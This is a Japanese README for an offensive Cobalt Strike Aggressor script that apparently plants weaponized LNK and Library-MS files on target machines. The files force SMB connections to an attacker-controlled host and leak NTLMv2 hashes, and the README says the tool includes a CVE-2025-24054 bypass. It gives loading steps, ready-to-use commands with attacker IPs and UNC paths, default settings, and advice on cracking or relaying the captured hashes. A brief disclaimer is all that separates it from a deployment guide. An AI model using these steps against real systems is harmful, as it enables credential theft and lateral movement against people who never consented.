
Cobalt Strike Aggressorスクリプト。LNKおよびLibrary-MSファイルを武器化してSMB NTLMv2ハッシュ開示をトリガーし、CVE-2025-24054バイパスを含む、認可されたレッドチーム運用向けです。
SMB NTLMv2-SSP ハッシュ漏洩のための悪意のある LNK ファイルおよび Library-MS ファイルを武器化し実行する、包括的な Cobalt Strike Aggressor スクリプトです。CVE-2025-24054 バイパス技術を含みます。
このツールは教育および研究目的のみに提供されています。作者は本コードの誤用に対して一切の責任を負いません。所有しているシステム、または明示的なテスト許可を得ているシステムでのみ使用してください。
このスクリプトは、開かれたときにオペレーターのホストへの SMB 認証をトリガーする、武器化された .lnk および .library-ms ファイルを生成します。
漏洩した NTLMv2 ハッシュは Cobalt Strike には表示されません。攻撃者システム上で動作している Responder、Impacket の ntlmrelayx.py、または Inveigh などの外部ツールでキャプチャする必要があります。
収集されたハッシュは、Hashcat でクラックするか、さらなる横移動のためにリレーすることができます。
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # Main Aggressor script (v2.0)
├── standalone_lnk_weaponizer.ps1 # Standalone PowerShell version
├── README.md # This documentation
├── INSTALL.md # Installation and setup guide
└── examples/
├── usage_scenarios.md # Practical usage examples
└── sample_targets.csv # Sample batch operation file
lnk_weaponizer.cna を Cobalt Strike Aggressor スクリプトディレクトリにコピーCobalt Strike → Script Manager に移動Load をクリックし、lnk_weaponizer.cna を選択Cobalt Strike の任意のビーコンを右クリックしてアクセス:
# Create LNK file with custom parameters
lnk_create <path> <ip> <share> <file>
# Example
lnk_create C:\Temp 192.168.1.10 share payload.exe
# Create Library-MS file with custom parameters
library_create <path> <ip> <share>
# Example
library_create C:\Temp 10.10.14.22 share
# Use default settings
lnk_quick
library_quick
# Show help
lnk_help
スクリプトは以下の設定可能なデフォルト値を使用します:
192.168.1.10shareC:\Templnk_weaponizer.cna 内のグローバル変数を編集:
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
.library-ms ファイルを生成両方の手法は以下のファイルを作成します:
スクリプトは詳細なログを提供します:
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash
ビーコンが見つからない
アクセス許可が拒否された
PowerShell 実行ポリシー
bpowershell() を使用して制限を処理スクリプトを変更して詳細出力を有効にする:
# Add debug logging
blog($bid, "[DEBUG] Executing command: " . $command);
# Create LNK file on specific target
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
# Create Library-MS file for CVE-2025-24054 bypass
library_create C:\Users\Public\Desktop 192.168.1.100 share
# Use default settings for rapid deployment
lnk_quick
library_quick
Library-MS 技術は以下の方法で CVE-2025-24054 のバイパスを実装します:
このプロジェクトは教育目的で現状のまま提供されています。責任を持って、適用される法律および規制に従って使用してください。
注意: どのシステムでもテストする前に必ず適切な許可を得てください。